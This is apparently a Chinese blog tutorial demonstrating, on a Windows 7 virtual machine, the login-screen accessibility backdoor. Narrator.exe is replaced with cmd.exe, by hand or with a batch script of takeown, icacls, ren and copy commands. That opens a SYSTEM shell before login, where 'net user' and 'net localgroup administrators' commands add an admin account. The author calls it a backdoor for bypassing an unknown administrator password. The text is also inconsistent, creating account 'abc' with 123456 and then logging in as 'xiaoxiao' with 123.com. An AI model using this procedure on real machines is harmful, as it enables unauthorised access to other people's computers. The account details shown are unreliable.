实验环境:虚拟机Win7
概要:当我们每次开启电脑时,都会出现如下界面,点击下图左下角所示的图标——
,就会出现 "轻松访问" 的对话框,勾选对话框上任意复选框,系统就会执行其相应的功能!注意,重点来了,这样是不是就意味着,只要我们将 'cmd' 应用程序重命名为 "轻松访问" 选项中任一程序(比如:朗读屏幕内容(讲述人),程序名为Narrator) 的名字,在我们勾选 "讲述人" 复选框并执行时,实际上出现的就是 "cmd命令提示符",而且是 system 权限。这意味着什么?我们可以在 "命令行提示符" 下建立一个新账户,并且可以绕过不知道原来管理员账户密码无法登录的限制。听到这里,是不是感觉很神奇!赶紧拿出你的电脑和我一起操作吧!
温馨提醒:此篇文章多图,为了不影响您的学习体验,建议移动到网好的地方观看^_^
讲完本篇文章要干的事情,接下来要讲的就是如何实现了,即对 "Narrator"应用程序 和 "cmd" 应用程序重命名。实现这一过程有两种方法:一种是鼠标点击的方法实现,另一种是用脚本的方法实现。
方法一
1、重命名 "Narrator" 应用程序
- 进入 "C盘" —> "Windows" —> "System32",出现如下所示界面:
当我们对程序 "Narrator" 进行重命名时,会出现如上所示界面,接下来我们就要对程序 "Narrator" 的权限进行修改。
观察下图,我们可以看到“Narrator”的当前所有者已经成功更改为Administrators(WIN7\Administrators)了。
接下来我们要做的就是将Administrators(WIN7\Administrators)的权限从"读取和执行" 修改成 "完全控制"。
到了这一步,我们就可以重命名 "Narrator",在这里我将它命名为 "Narrator1"。
2、将 "cmd" 重命为 "Narrator"
找到了 "cmd" 应用程序,接下来要做的就是对 "cmd" 应用程序进行所有者更改和修改权限了,具体操作步骤同 "Narrator" 应用程序的修改过程相同(步骤1-14)。
在上述操作完成的条件下,将 "cmd" 应用程序重命为 "Narrator",这样我们在执行 "Narrator" 时,实际上执行的是 "cmd" 应用程序。
3、登录系统
上面讲了这么多,我们都是为了这一步做准备的!!!
1> 执行完上面的操作后重启电脑,进入以下界面:
2> 系统在没有输入密码的情况下弹出了一个命令窗口,运行whoami命令,发现竟然是system权限,如下图所示:
3> 接下来我们依次执行以下两个命令:
net user abc 123456 /add
net localgroup administrators /add abc
4> 关闭这个命令窗口,再次重启系统,以刚才建立的 'xiaoxiao' 账户登录,我们可以进入电脑了。
由于我的这台主机之前加入了一个域,所以在使用 'xiaoxiao' 账户登录时,需在前面加上主机名Win7。如果你没有加入过域,则直接以 'xiaoxiao' 登录,密码就是我们刚才设置的123.com。这样我们就可以绕过了不知道原来管理员账户密码无法登录的限制。
方法二
1、在C盘下新建一个test目录,进入test目录里,打开记事本,输入如下文本:
cd c:\windows\system32 #切换到 c:\windows\system32 目录里
takeown /f narrator.exe #将 narrator.exe 的所有者改为 本机登录的用户
icacls narrator.exe /grant administrators:F #将 narrator.exe 的权限改为 '完全控制'
ren narrator.exe narrator_back.exe #将 narrator.exe 重命名为 narrator_back.exe
copy cmd.exe narrator.exe #复制 cmd.exe 并命名为 narrator.exe
2、写完后保存为back.bat,强调一下,保存类型一定要选择 '所有文件',如下图所示。
3、接下来,进入C盘刚建的test目录,鼠标右击刚才创建的back文件,选择以管理员身份运行,操作系统会弹出如下对话框,直接选 "是"。
4、之后屏幕会闪烁一下,说明后门已经搞好了。接下来你要做的就是重启一下电脑,然后创建一个新用户,再次重启电脑,以刚才建立的账户登录,我们可以进入电脑了。
至于这个实验能做什么,大家可以自行脑补一下,我就不在这里明说了,哈哈哈!
由于每个人实验的环境的不同,在操作的过程中可能会有些许不同,欢迎前来指点^_^